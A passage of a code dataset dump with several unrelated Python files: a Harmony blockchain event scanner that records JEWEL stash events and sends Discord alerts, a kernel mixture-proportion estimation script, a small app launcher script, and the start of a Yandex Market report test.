= time.time() - start\n all_processed += new_entries\n\n if progress_callback:\n progress_callback(\n start_block,\n end_block,\n current_block,\n end_block_timestamp,\n chunk_size,\n len(new_entries),\n )\n\n # Try to guess how many blocks to fetch over `eth_getLogs` API next time\n chunk_size = self.estimate_next_chunk_size(\n chunk_size, len(new_entries))\n\n # Set where the next chunk starts\n current_block = current_end + 1\n total_chunks_scanned += 1\n self.state.end_chunk(min(current_end, end_block))\n\n return all_processed, total_chunks_scanned\n\n\ndef _retry_web3_call(func, start_block, end_block, retries, delay) -> Tuple[int, list]:\n \"\"\"A custom retry loop to throttle down block range.\n\n If our JSON-RPC server cannot serve all incoming `eth_getLogs` in a single request,\n we retry and throttle down block range for every retry.\n\n For example, Go Ethereum does not indicate what is an acceptable response size.\n It just fails on the server-side with a \"context was cancelled\" warning.\n\n :param func: A callable that triggers Ethereum JSON-RPC, as func(start_block, end_block)\n :param start_block: The initial start block of the block range\n :param end_block: The initial start block of the block range\n :param retries: How many times we retry\n :param delay: Time to sleep between retries\n \"\"\"\n for i in range(retries):\n try:\n return end_block, func(start_block, end_block)\n except Exception as e:\n # Assume this is HTTPConnectionPool(host=\"localhost\", port=8545): Read timed out. (read timeout=10)\n # from Go Ethereum. This translates to the error \"context was cancelled\" on the server side:\n # https://github.com/ethereum/go-ethereum/issues/20426\n if i < retries - 1:\n # Give some more verbose info than the default middleware\n logger.warning(\n \"Retrying events for block range %d - %d (%d) failed with %s, retrying in %s seconds\",\n start_block,\n end_block,\n end_block - start_block,\n e,\n delay,\n )\n # Decrease the `eth_getBlocks` range\n end_block = start_block + ((end_block - start_block) // 2)\n # Let the JSON-RPC to recover e.g. from restart\n time.sleep(delay)\n continue\n else:\n logger.warning(\"Out of retries\")\n raise\n\n\ndef _fetch_events_for_all_contracts(\n web3, event, argument_filters: dict, from_block: int, to_block: int\n) -> Iterable:\n \"\"\"Get events using eth_getLogs API.\n\n This method is detached from any contract instance.\n\n This is a stateless method, as opposed to createFilter.\n It can be safely called against nodes which do not provide `eth_newFilter` API, like Infura.\n \"\"\"\n\n if from_block is None:\n raise TypeError(\n \"Missing mandatory keyword argument to getLogs: fromBlock\")\n\n # Currently no way to poke this using a public Web3.py API.\n # This will return raw underlying ABI JSON object for the event\n abi = event._get_event_abi()\n\n # Depending on the Solidity version used to compile\n # the contract that uses the ABI,\n # it might have Solidity ABI encoding v1 or v2.\n # We just assume the default that you set on Web3 object here.\n # More information here https://eth-abi.readthedocs.io/en/latest/index.html\n codec: ABICodec = web3.codec\n\n # Here we need to poke a bit into Web3 internals, as this\n # functionality is not exposed by default.\n # Construct JSON-RPC raw filter presentation based on human readable Python descriptions\n # Namely, convert event names to their keccak signatures\n # More information here:\n # https://github.com/ethereum/web3.py/blob/e176ce0793dafdd0573acc8d4b76425b6eb604ca/web3/_utils/filters.py#L71\n data_filter_set, event_filter_params = construct_event_filter_params(\n abi,\n codec,\n address=argument_filters.get(\"address\"),\n argument_filters=argument_filters,\n fromBlock=from_block,\n toBlock=to_block,\n )\n\n logger.debug(\n \"Querying eth_getLogs with the following parameters: %s\", event_filter_params\n )\n\n # Call JSON-RPC API on your Ethereum node.\n # get_logs() returns raw AttributedDict entries\n logs = web3.eth.get_logs(event_filter_params)\n\n # Convert raw binary data to Python proxy objects as described by ABI\n all_events = []\n for log in logs:\n # Convert raw JSON-RPC log result to human readable event by using ABI data\n # More information how processLog works here\n # https://github.com/ethereum/web3.py/blob/fbaf1ad11b0c7fac09ba34baff2c256cffe0a148/web3/_utils/events.py#L200\n evt = get_event_data(codec, abi, log)\n # Note: This was originally yield,\n # but deferring the timeout exception caused the throttle logic not to work\n all_events.append(evt)\n return all_events\n\n\nclass SqliteDictState(IEventScannerState):\n \"\"\"Store the state of scanned blocks and all events.\n\n All state is a dict backed by sqlite, by using sqlitedict.\n \"\"\"\n\n def __init__(self):\n pass\n\n def reset(self):\n \"\"\"Create initial state of nothing scanned.\"\"\"\n self.state_meta.clear()\n self.state_utxo.clear()\n self.state_utxos_by_user.clear()\n self.state_utxo_redemptions.clear()\n self.state_meta[\"last_scanned_block\"] = FIRST_BLOCK_TO_SCAN\n self.state_meta[\"last_utxo_redemption_index\"] = 0\n self.commit()\n\n def restore(self):\n self.state_meta = SqliteDict(\n filename=os.path.join(DB_FOLDER_PREFIX, \"./state_meta.sqlite\"),\n autocommit=False,\n flag=\"c\",\n journal_mode=\"WAL\",\n )\n self.state_utxo = SqliteDict(\n filename=os.path.join(DB_FOLDER_PREFIX, \"./state_utxo.sqlite\"),\n autocommit=False,\n flag=\"c\",\n journal_mode=\"WAL\",\n )\n self.state_utxo_seen_events = SqliteDict(\n filename=os.path.join(\n DB_FOLDER_PREFIX, \"./state_utxo_seen_events.sqlite\"),\n autocommit=False,\n flag=\"c\",\n journal_mode=\"WAL\",\n )\n self.state_utxos_by_user = SqliteDict(\n filename=os.path.join(\n DB_FOLDER_PREFIX, \"./state_utxos_by_user.sqlite\"),\n autocommit=False,\n flag=\"c\",\n journal_mode=\"WAL\",\n )\n self.state_utxo_redemptions = SqliteDict(\n filename=os.path.join(\n DB_FOLDER_PREFIX, \"./state_utxo_redemptions.sqlite\"),\n autocommit=False,\n flag=\"c\",\n journal_mode=\"WAL\",\n )\n self.state_aggregates = SqliteDict(\n filename=os.path.join(\n DB_FOLDER_PREFIX, \"./state_aggregates.sqlite\"),\n autocommit=False,\n flag=\"c\",\n journal_mode=\"WAL\",\n )\n\n def save(self):\n logger.debug(\"...CLOSING STATE...\")\n self.state_meta.close()\n self.state_utxo.close()\n self.state_utxo_seen_events.close()\n self.state_utxos_by_user.close()\n self.state_utxo_redemptions.close()\n self.state_aggregates.close()\n logger.debug(\"...STATE CLOSED...\")\n\n def commit(self):\n logger.debug(\"...COMITTING STATE...\")\n self.state_meta.commit(blocking=True)\n self.state_utxo.commit(blocking=True)\n self.state_utxo_seen_events.commit(blocking=True)\n self.state_utxos_by_user.commit(blocking=True)\n self.state_utxo_redemptions.commit(blocking=True)\n self.state_aggregates.commit(blocking=True)\n logger.debug(\"...STATE COMMITED...\")\n\n #\n # EventScannerState methods implemented below\n #\n\n def get_last_scanned_block(self):\n \"\"\"The number of the last block we have stored.\"\"\"\n return (\n self.state_meta[\"last_scanned_block\"]\n if \"last_scanned_block\" in self.state_meta\n else FIRST_BLOCK_TO_SCAN\n )\n\n def delete_data(self, since_block):\n \"\"\"Remove potentially reorganised blocks from the scan data.\"\"\"\n pass\n\n def start_chunk(self, block_number, chunk_size):\n \"\"\"Save at the end of each chunk, so we can resume in the case of a crash or CTRL+C\"\"\"\n self.commit()\n\n def end_chunk(self, block_number):\n \"\"\"Save at the end of each chunk, so we can resume in the case of a crash or CTRL+C\"\"\"\n # Next time the scanner is started we will resume from this block\n self.state_meta[\"last_scanned_block\"] = block_number\n self.commit()\n\n def process_event(\n self, block_when: datetime.datetime, event: AttributeDict, tx: AttributeDict, latest_block_number: BlockNumber\n ) -> str:\n \"\"\"Record a ERC-20 transfer in our database.\"\"\"\n # Events are keyed by their transaction hash and log index\n # One transaction may contain multiple events\n # and each one of those gets their own log index\n\n # event_name = event.event # \"Transfer\"\n log_index = event.logIndex # Log index within the block\n # transaction_index = event.transactionIndex # Transaction index within the block\n txhash = event.transactionHash.hex() # Transaction hash\n block_number = event.blockNumber\n event_type = event[\"event\"]\n\n utxoObject = None\n\n # Convert ERC-20 Transfer event to our internal format\n args = event[\"args\"]\n\n def is_event_seen(db):\n key = f\"{block_number}-{txhash}-{log_index}-{event_type}\"\n return key in db and db[key] is True\n\n def mark_event_as_seen(db):\n key = f\"{block_number}-{txhash}-{log_index}-{event_type}\"\n db[key] = True\n\n # TODO: refactor all this so it\"s not just one big function\n if event_type == \"UTXOCreated\":\n if not is_event_seen(self.state_utxo_seen_events):\n utxoObject = {\n \"utxoAddress\": args[\"utxoAddress\"].lower(),\n \"minter\": args[\"minter\"].lower(),\n }\n\n if (\n utxoObject[\"minter\"] in self.state_utxos_by_user\n and self.state_utxos_by_user[utxoObject[\"minter\"]] is not None\n ):\n list_for_minter = self.state_utxos_by_user[utxoObject[\"minter\"]]\n if (\n utxoObject[\"utxoAddress\"]\n not in self.state_utxos_by_user[utxoObject[\"minter\"]]\n ):\n list_for_minter.append(utxoObject[\"utxoAddress\"])\n self.state_utxos_by_user[utxoObject[\"minter\"]\n ] = list_for_minter\n else:\n self.state_utxos_by_user[utxoObject[\"minter\"]] = [\n utxoObject[\"utxoAddress\"]\n ]\n mark_event_as_seen(self.state_utxo_seen_events)\n else:\n logger.warn(\n f\"Already seen UTXOCreated event {block_number}-{txhash}-{log_index}\"\n )\n elif event_type == \"UTXOValue\":\n if not is_event_seen(self.state_utxo_seen_events):\n utxoObject = {\n \"utxoAddress\": args[\"UTXOAddress\"].lower(),\n \"newVal\": str(args[\"newVal\"]),\n \"blockNumber\": block_number,\n \"timestamp\": block_when.timestamp() * 1000, # milliseconds\n }\n if int(args[\"newVal\"]) > 0 and block_number > (latest_block_number - 100):\n notify_new_stash(args[\"newVal\"])\n mark_event_as_seen(self.state_utxo_seen_events)\n else:\n logger.warn(\n f\"Already seen UTXOValue event {block_number}-{txhash}-{log_index}\"\n )\n elif event_type == \"UTXORedeemed\":\n if not is_event_seen(self.state_utxo_redemptions):\n last_utxo_redemption_index = (\n self.state_meta[\"last_utxo_redemption_index\"]\n if \"last_utxo_redemption_index\" in self.state_meta\n else \"0\"\n ) or \"0\"\n next_utxo_redemption_index = int(\n last_utxo_redemption_index) + 1\n _redeem = args[\"redeemooor\"].lower()\n if args[\"redeemooor\"].lower() == ADDRESSES[\"PawnShopRouter\"].lower():\n _redeem = tx[\"from\"].lower()\n self.state_utxo_redemptions[next_utxo_redemption_index] = {\n \"tx\": txhash,\n \"utxoAddress\": args[\"UTXOAddress\"].lower(),\n \"redeemedBy\": str(_redeem),\n \"amount\": str(args[\"redeemedAmount\"]),\n \"fee\": str(args[\"feePaid\"]),\n \"amountInJewel\": str(args[\"feeRatio\"]),\n \"totalCost\": str(args[\"totalCost\"]),\n \"blockNumber\": block_number,\n \"timestamp\": block_when.timestamp() * 1000, # milliseconds\n }\n if block_number > (latest_block_number - 100):\n notify_redeemed_stash(int(args[\"redeemedAmount\"]))\n mark_event_as_seen(self.state_utxo_redemptions)\n self.state_meta[\n \"last_utxo_redemption_index\"\n ] = next_utxo_redemption_index\n else:\n logger.warn(\n f\"Already seen UTXORedeemed event {block_number}-{txhash}-{log_index}\"\n )\n\n if utxoObject is None:\n # no update made to object\n pass\n elif (\n utxoObject[\"utxoAddress\"] in self.state_utxo\n and self.state_utxo[utxoObject[\"utxoAddress\"]] is not None\n ):\n current_object = self.state_utxo[utxoObject[\"utxoAddress\"]]\n current_object.update(utxoObject)\n self.state_utxo[utxoObject[\"utxoAddress\"]] = current_object\n else:\n self.state_utxo[utxoObject[\"utxoAddress\"]] = utxoObject\n\n # AGGREGATES\n if not is_event_seen(self.state_aggregates):\n # large numbers are always stored as string because JSON cannot handle massive uint256\n def get_agg(key):\n return int(\n (\n self.state_aggregates[key]\n if key in self.state_aggregates\n else \"0\"\n )\n or \"0\"\n )\n\n def get_agg_in_cur_bucket(key):\n bucket_key = block_when.replace(\n minute=0, second=0, microsecond=0\n ).isoformat(timespec=\"seconds\")\n key_ = f\"{key}-{bucket_key}\"\n return int(\n (\n self.state_aggregates[key_]\n if key_ in self.state_aggregates\n else \"0\"\n )\n or \"0\"\n )\n\n def update_agg(key, value, bucketValue=None):\n self.state_aggregates[key] = str(value)\n bucket_time = block_when.replace(\n minute=0, second=0, microsecond=0\n ).isoformat(timespec=\"seconds\")\n self.state_aggregates[f\"{key}-{bucket_time}\"] = str(\n bucketValue if bucketValue is not None else value\n )\n\n current_total_stashes = get_agg(\"totalStashes\")\n current_locked_jewel_in_protocol = get_agg(\"lockedJewelTotal\")\n current_total_fees_paid = get_agg(\"totalFeesPaid\")\n current_total_fees_paid_in_jewel = get_agg(\"totalFeesPaidInJewel\")\n current_total_redemptions_volume = get_agg(\n \"totalRedemptionsVolume\")\n\n if event_type == \"UTXOCreated\":\n update_agg(\"totalStashes\", current_total_stashes + 1)\n elif event_type == \"MintedFromUTXO\":\n update_agg(\n \"lockedJewelTotal\",\n current_locked_jewel_in_protocol +\n int(args[\"mintedAmount\"]),\n )\n elif event_type == \"UTXORedeemed\":\n update_agg(\n \"lockedJewelTotal\",\n current_locked_jewel_in_protocol -\n int(args[\"redeemedAmount\"]),\n )\n update_agg(\n \"totalFeesPaid\", current_total_fees_paid +\n int(args[\"feePaid\"])\n )\n update_agg(\n \"totalFeesPaidInJewel\",\n current_total_fees_paid_in_jewel + int(args[\"feeRatio\"]),\n )\n update_agg(\n \"totalRedemptionsVolume\",\n current_total_redemptions_volume +\n int(args[\"redeemedAmount\"]),\n )\n\n mark_event_as_seen(self.state_aggregates)\n\n self.commit()\n\n # Return a pointer that allows us to look up this event later if needed\n return f\"{block_number}-{txhash}-{log_index}\"\n\n\nscheduler = sched.scheduler(time.time, time.sleep)\n\n\ndef run(sc):\n api_url = (\n os.environ[\"HARMONY_RPC_URL\"]\n if \"HARMONY_RPC_URL\" in os.environ\n else \"http://127.0.0.1:8545\"\n )\n\n # Enable logs to the stdout.\n # DEBUG is very verbose level\n logging.basicConfig(level=logging.INFO)\n\n provider = HTTPProvider(api_url)\n\n # Remove the default JSON-RPC retry middleware\n # as it correctly cannot handle eth_getLogs block range\n # throttle down.\n provider.middlewares.clear()\n\n web3 = Web3(provider)\n\n # Prepare stub ERC-20 contract object\n abi = CONTRACT_ABI\n CONTRACT = web3.eth.contract(abi=abi)\n\n # Restore/create our persistent state\n state = SqliteDictState()\n state.restore()\n\n # chain_id: int, web3: Web3, abi: dict, state: EventScannerState, events: List, filters: {}, max_chunk_scan_size: int=10000\n scanner = EventScanner(\n web3=web3,\n contract=CONTRACT,\n state=state,\n events=[\n CONTRACT.events.UTXOValue,\n CONTRACT.events.UTXOCreated,\n CONTRACT.events.UTXORedeemed,\n CONTRACT.events.MintedFromUTXO,\n ],\n filters={\"address\": CONTRACT_ADDRESS},\n # How many maximum blocks at the time we request from JSON-RPC\n # and we are unlikely to exceed the response size limit of the JSON-RPC server\n max_chunk_scan_size=1000,\n )\n\n # Assume we might have scanned the blocks all the way to the last Ethereum block\n # that mined a few seconds before the previous scan run ended.\n # Because there might have been a minor Etherueum chain reorganisations\n # since the last scan ended, we need to discard\n # the last few blocks from the previous scan results.\n chain_reorg_safety_blocks = 20\n scanner.delete_potentially_forked_block_data(\n state.get_last_scanned_block() - chain_reorg_safety_blocks\n )\n\n # Scan from [last block scanned] - [latest ethereum block]\n # Note that our chain reorg safety blocks cannot go negative\n start_block = max(state.get_last_scanned_block() -\n chain_reorg_safety_blocks, 0)\n end_block = scanner.get_suggested_scan_end_block()\n blocks_to_scan = end_block - start_block\n\n logger.info(f\"Scanning events from blocks {start_block} - {end_block}\")\n\n # Render a progress bar in the console\n start = time.time()\n\n def _update_progress(\n start, end, current, current_block_timestamp, chunk_size, events_count\n ):\n if current_block_timestamp:\n formatted_time = current_block_timestamp.strftime(\"%d-%m-%Y\")\n else:\n formatted_time = \"no block time available\"\n logger.info(\n f\"Current block: {current} ({formatted_time}), blocks in a scan batch: {chunk_size}, events processed in a batch {events_count}\"\n )\n\n # Run the scan\n result, total_chunks_scanned = scanner.scan(\n start_block, end_block, progress_callback=_update_progress\n )\n\n state.save()\n duration = time.time() - start\n logger.info(\n f\"Scanned total {len(result)} events, in {duration} seconds, total {total_chunks_scanned} chunk scans performed\"\n )\n scheduler.enter(RUN_EVERY_X_SECONDS, 1, run, (sc,))\n\n\nscheduler.enter(RUN_EVERY_X_SECONDS, 1, run, (scheduler,))\n\n\ndef notify_new_stash(value):\n webhook = DiscordWebhook(\n url=DISCORD_WEBHOOK_URL,\n content=f\"New JEWEL stash has been minted! {value/1e18:.3f} locked JEWEL can be claimed.\",\n )\n response = webhook.execute()\n\n\ndef notify_redeemed_stash(redeemed_value):\n webhook = DiscordWebhook(\n url=DISCORD_WEBHOOK_URL,\n content=f\"A JEWEL stash has just been redeemed for {redeemed_value/1e18:.3f}. Need to be quicker next time!\",\n )\n response = webhook.execute()\n","repo_name":"gmguild/gmJEWEL","sub_path":"backend/scanners/jewel/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":35136,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"4050878382","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDO MIXTURE PROPORTION ESTIMATION \nUsing gradient thresholding of the $\\C_S$-distance\n\"\"\"\nfrom cvxopt import matrix, solvers, spmatrix\nfrom math import sqrt\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.close('all')\nimport scipy.linalg as scilin\n\n\ndef find_nearest_valid_distribution(u_alpha, kernel, initial=None, reg=0):\n \"\"\" (solution,distance_sqd)=find_nearest_valid_distribution(u_alpha,kernel):\n Given a n-vector u_alpha summing to 1, with negative terms, \n finds the distance (squared) to the nearest n-vector summing to 1, \n with non-neg terms. Distance calculated using nxn matrix kernel. \n Regularization parameter reg -- \n\n min_v (u_alpha - v)^\\top K (u_alpha - v) + reg* v^\\top v\"\"\"\n\n P = matrix(2 * kernel)\n n = kernel.shape[0]\n q = matrix(np.dot(-2 * kernel, u_alpha))\n A = matrix(np.ones((1, n)))\n b = matrix(1.)\n G = spmatrix(-1., range(n), range(n))\n h = matrix(np.zeros(n))\n dims = {'l': n, 'q': [], 's': []}\n solvers.options['show_progress'] = False\n solution = solvers.coneqp(\n P,\n q,\n G,\n h,\n dims,\n A,\n b,\n initvals=initial\n )\n distance_sqd = solution['primal objective'] + np.dot(u_alpha.T,\n np.dot(kernel, u_alpha))[0, 0]\n return (solution, distance_sqd)\n\n\ndef get_distance_curve(\n kernel,\n lambda_values,\n N,\n M=None,\n ):\n \"\"\" Given number of elements per class, full kernel (with first N rows corr.\n to mixture and the last M rows corr. to component, and set of lambda values\n compute $\\hat d(\\lambda)$ for those values of lambda\"\"\"\n\n d_lambda = []\n if M == None:\n M = kernel.shape[0] - N\n prev_soln=None \n for lambda_value in lambda_values:\n u_lambda = lambda_value / N * np.concatenate((np.ones((N, 1)),\n np.zeros((M, 1)))) + (1 - lambda_value) / M \\\n * np.concatenate((np.zeros((N, 1)), np.ones((M, 1))))\n #Can I save distance here?\n (solution, distance_sqd) = \\\n find_nearest_valid_distribution(u_lambda, kernel, initial=prev_soln)\n prev_soln = solution\n d_lambda.append(sqrt(distance_sqd))\n d_lambda = np.array(d_lambda)\n return d_lambda\n\n\ndef compute_best_rbf_kernel_width(X_mixture,X_component): \n N=X_mixture.shape[0]\n M=X_component.shape[0]\n # compute median of pairwise distances\n X=np.concatenate((X_mixture,X_component))\n dot_prod_matrix=np.dot(X,X.T)\n norms_squared=sum(np.multiply(X,X).T) \n distance_sqd_matrix=np.tile(norms_squared,(N+M,1)) + \\\n np.tile(norms_squared,(N+M,1)).T - 2*dot_prod_matrix \n kernel_width_median = sqrt(np.median(distance_sqd_matrix))\n kernel_width_vals= np.logspace(-1,1,5) * kernel_width_median\n \n # Find best kernel width\n \n max_dist_RKHS=0\n for kernel_width in kernel_width_vals: \n kernel=np.exp(-distance_sqd_matrix/(2.*kernel_width**2.)) \n dist_diff = np.concatenate((np.ones((N, 1)) / N, \n -1 * np.ones((M,1)) / M))\n distribution_RKHS_distance = sqrt(np.dot(dist_diff.T, \n np.dot(kernel, dist_diff))[0,0])\n if distribution_RKHS_distance > max_dist_RKHS:\n max_dist_RKHS=distribution_RKHS_distance\n best_kernel_width=kernel_width \n kernel=np.exp(-distance_sqd_matrix/(2.*best_kernel_width**2.))\n return best_kernel_width,kernel\n\n \ndef mpe(kernel,N,M,nu,epsilon=0.04,lambda_upper_bound=8.):\n \"\"\" Do mixture proportion estimation (as in paper)for N points from \n mixture F and M points from component H, given kernel of size (N+M)x(N+M), \n with first N points from the mixture and last M points from \n the component, and return estimate of lambda_star where\n G =lambda_star*F + (1-lambda_star)*H\"\"\"\n\n dist_diff = np.concatenate((np.ones((N, 1)) / N, -1 * np.ones((M,1)) / M))\n distribution_RKHS_distance = sqrt(np.dot(dist_diff.T, \n np.dot(kernel, dist_diff))[0,0])\n lambda_left=1.\n lambda_right=lambda_upper_bound \n while lambda_right-lambda_left>epsilon:\n lambda_value=(lambda_left+lambda_right)/2. \n u_lambda = lambda_value / N * np.concatenate((np.ones((N, 1)),\n np.zeros((M, 1)))) + (1 - lambda_value) / M \\\n * np.concatenate((np.zeros((N, 1)), np.ones((M, 1))))\n (solution, distance_sqd) = \\\n find_nearest_valid_distribution(u_lambda, kernel)\n d_lambda_1=sqrt(distance_sqd)\n \n lambda_value=(lambda_left+lambda_right)/2. + epsilon/2. \n u_lambda = lambda_value / N * np.concatenate((np.ones((N, 1)),\n np.zeros((M, 1)))) + (1 - lambda_value) / M \\\n * np.concatenate((np.zeros((N, 1)), np.ones((M, 1))))\n (solution, distance_sqd) = \\\n find_nearest_valid_distribution(u_lambda, kernel)\n d_lambda_2=sqrt(distance_sqd)\n \n slope_lambda=(d_lambda_2 - d_lambda_1)*2./epsilon \n \n if slope_lambda > nu*distribution_RKHS_distance:\n lambda_right=(lambda_left+lambda_right)/2.\n else:\n lambda_left=(lambda_left+lambda_right)/2.\n \n return (solution, (lambda_left+lambda_right)/2.)\n \n\ndef wrapper(X_mixture,X_component): \n \"\"\" Takes in 2 arrays containing the mixture and component data as \n numpy arrays, and prints the estimate of kappastars using the two gradient \n thresholds as detailed in the paper as KM1 and KM2\"\"\"\n \n N=X_mixture.shape[0] \n M=X_component.shape[0]\n best_width,kernel=compute_best_rbf_kernel_width(X_mixture,X_component) \n lambda_values=np.array([1.00,1.05]) \n dists=get_distance_curve(kernel,lambda_values,N=N,M=M)\n begin_slope=(dists[1]-dists[0])/(lambda_values[1]-lambda_values[0])\n dist_diff = np.concatenate((np.ones((N, 1)) / N, -1 * np.ones((M,1)) / M))\n distribution_RKHS_dist = sqrt(np.dot(dist_diff.T, np.dot(kernel, dist_diff))[0,0])\n thres_par=0.2 \n nu1=(1-thres_par)*begin_slope + thres_par*distribution_RKHS_dist\n nu1=nu1/distribution_RKHS_dist \n (solution, lambda_star_est_1)=mpe(kernel,N,M,nu=nu1)\n kappa_star_est_1=(lambda_star_est_1-1)/lambda_star_est_1 \n nu2=1/sqrt(np.min([M,N]))\n nu2=nu2/distribution_RKHS_dist\n if nu2>0.9:\n nu2=nu1\n (solution, lambda_star_est_2)=mpe(kernel,N,M,nu=nu2) \n kappa_star_est_2=(lambda_star_est_2-1)/lambda_star_est_2\n return (kappa_star_est_2,kappa_star_est_1, solution)\t\n \ndef id_example(total_observations = 1000, kappa_star = 0.4, size = 100, mean_comp = 10.):\n \"\"\"Attempts to show how we might adapt the algorithm to give\n an identification of the most similar observations\"\"\"\n total_observations = total_observations\n kappa_star = kappa_star\n size = size\n mean_comp = np.repeat(mean_comp, size)\n X_mixture = np.concatenate((np.random.randn(int((1-kappa_star)*total_observations/2), size), \n np.random.randn(int(kappa_star*total_observations/2), size)+\n mean_comp))\n X_component = np.random.randn(total_observations/2, size)+ mean_comp\n (KM1,KM2,solution)=wrapper(X_mixture,X_component)\n\n #Take the part of the solution that comes from the mixture\n mixture_solution = solution['x'][0:(X_mixture.shape[0]-1)]\n print(\"Estimate of Kappa^star = \", KM2)\n print(\"\\n Probabilities: \")\n print(mixture_solution)\n\n #Now, using the solution, find the component in the mixture\n #First, define container for the results\n comp_in_mixture = np.ones((2,int(round(KM2*X_mixture.shape[0]))))\n\n #Next, find solutions that have the smallest probability -- these are the ones most likely from the component\n t = int(0)\n for i in mixture_solution:\n #Find the minimum probability record so far\n max_prob = np.argmax(comp_in_mixture[1])\n\n #If the next record has a higher probability, replace the minimum\n if i < comp_in_mixture[1][max_prob]:\n comp_in_mixture[0][max_prob] = t\n comp_in_mixture[1][max_prob] = i\n\n #Increment the index\n t+=1\n return (KM2, comp_in_mixture)\n\n\nif __name__=='__main__':\n \"\"\" Calls wrapper with a GMM as the mixture distribution and one of the \n components as the component distribution. Replace the X_mixture and X_component \n variables according to your data\"\"\"\n total_observations = np.random.randint(2,1000)\n kappa_star = np.random.uniform(0.1,0.9)\n size = np.random.randint(2,100)\n mean_comp=np.random.uniform(0,15,size)\n X_mixture = np.concatenate((np.random.randn(int((1-kappa_star)*total_observations/2), size), \n np.random.randn(int(kappa_star*total_observations/2), size)+\n mean_comp))\n X_component = np.random.randn(total_observations/2, size)+ mean_comp\n print(\"Kappa* = \",kappa_star)\n (KM1,KM2,solution)=wrapper(X_mixture,X_component)\n print(\"Observations = \",total_observations)\n print(\"Covariates = \",size)\n print(\"KM1_estimate = \",KM1)\n print(\"KM2_estimate = \",KM2)\n print(\"Solution = \", solution)\n","repo_name":"stewarthkerr/STAT771","sub_path":"project/code/Kernel_MPE_grad_threshold.py","file_name":"Kernel_MPE_grad_threshold.py","file_ext":"py","file_size_in_byte":9508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42177189790","text":"#!/usr/bin/env python\nimport os\nimport signal\nimport sys\n\n# Signal handler for ctrl+c\ndef signalHandler(sig, frame):\n os.system(\"pkill flask\")\n os.system(\"pkill node\")\n os.system(\"pkill 'ng serve'\")\n os.system(\"pkill 'Python'\")\n print(\"App closed\")\n sys.exit(0)\n\n# Bind signal SIGINT\nsignal.signal(signal.SIGINT, signalHandler)\n\n# Start server\nos.system(\"python3 server.py &\")\n\n# Start client\nos.system(\"python3 client.py &\")\n\n# Wait for ctrl+c\nsignal.pause()\n\n","repo_name":"jferdelyi/Generator","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"185297089","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport runner # noqa\n\nfrom core.types import MarketSku, Model, Offer, Region, RegionalModel, Shop\nfrom core.testcase import TestCase, main\n\n\nclass _C:\n rid_unknown = 3\n\n\nclass T(TestCase):\n @classmethod\n def prepare(cls):\n cls.disable_check_empty_output()\n\n cls.index.regional_models += [\n RegionalModel(hyperid=175941311, rids=[54, 194], has_good_cpa=False, has_cpa=True),\n ]\n\n cls.index.models += [\n Model(hyperid=175941311, hid=44),\n Model(hyperid=10, hid=44),\n Model(hyperid=200, hid=55),\n ]\n\n for i in range(20):\n cls.index.models.append(Model(hyperid=201 + i, hid=55))\n\n cls.index.regiontree = [\n Region(rid=194, name='Саратов'),\n Region(\n rid=54,\n name='Екб',\n children=[\n Region(rid=100500, name='улица в ЕКб'),\n ],\n ),\n ]\n\n cls.index.shops += [\n Shop(fesh=4, priority_region=54, regions=[54, 194], cpa=Shop.CPA_REAL, name='СPA Екб'),\n Shop(fesh=5, priority_region=54, regions=[54, 194], cpa=Shop.CPA_NO, cpc=Shop.CPC_REAL, name='CPC Екб'),\n ]\n\n cls.index.mskus += [\n MarketSku(hyperid=175941311, hid=44, sku=1010),\n MarketSku(hyperid=665306170, hid=44, sku=1020),\n MarketSku(hyperid=10, hid=44, sku=1030),\n MarketSku(hyperid=200, hid=55, sku=1050),\n ]\n\n cls.index.offers += [\n Offer(fesh=4, title=\"CPA офер #2\", cpa=Offer.CPA_REAL, hyperid=175941311, price=200, sku=1010, hid=44),\n Offer(\n fesh=5,\n title=\"CPA_NO офер, модель из конфига\",\n cpa=Offer.CPA_NO,\n price=100,\n hyperid=175941311,\n sku=1010,\n hid=44,\n ),\n Offer(fesh=5, title=\"CPA_NO 10\", cpa=Offer.CPA_NO, hyperid=10, sku=1030, hid=44),\n Offer(fesh=4, title=\"CPA_REAL 55\", cpa=Offer.CPA_REAL, hyperid=200, price=555, sku=1050, hid=55),\n ]\n\n # Несколько моделей в магазинах в Екатеринбурге\n # У модели 665306170 нет офферов\n # У модели 10 есть только cpc\n # В выдаче должны быть только эти две модели, у остальных есть cpa\n # Параметр use-default-offers не должен повлиять\n def test_out_of_stock_cpa_model_filter(self):\n \"\"\"Проверяем выдачу моделей с фильтрацией по отсутствию cpa-офферов\"\"\"\n for do in ('0', '1'):\n request = (\n 'place=prime&pp=18&entities=product&local-offers-first=0&rids=54&hid=44'\n + '&cpa-out-of-stock-models=1&use-default-offers=%s' % do\n )\n response = self.report.request_json(request)\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"total\": 2,\n \"totalModels\": 2,\n \"results\": [\n {\"id\": 10, \"type\": \"model\", \"offers\": {\"count\": 0}},\n {\"id\": 665306170, \"type\": \"model\", \"offers\": {\"count\": 0}},\n ],\n }\n },\n allow_different_len=False,\n )\n\n # https://st.yandex-team.ru/MARKETOUT-44507 - не отдаем модели \"не в продаже\" для экспресса\n def test_out_of_stock_cpa_model_filter_with_express(self):\n \"\"\"Проверяем выдачу моделей с фильтрацией по отсутствию cpa-офферов + с фильтром по экспресс-доставке.\n Условия аналогичны test_out_of_stock_cpa_model_filter, но не должны найти ничего, хотя у моделей нет cpa-офферов.\"\"\"\n\n for do in ('0', '1'):\n request = (\n 'place=prime&pp=18&entities=product&local-offers-first=0&&rids=54&hid=44'\n + '&cpa-out-of-stock-models=1&filter-express-delivery=1&use-default-offers=%s' % do\n )\n response = self.report.request_json(request)\n self.assertFragmentIn(\n response,\n {\"search\": {\"total\": 0, \"totalModels\": 0, \"results\": []}},\n allow_different_len=False,\n )\n\n def test_out_of_stock_cpa_model_filter_shutdown(self):\n \"\"\"Проверяем отключение выдачи через rearr\"\"\"\n\n for do in ('0', '1'):\n request = (\n 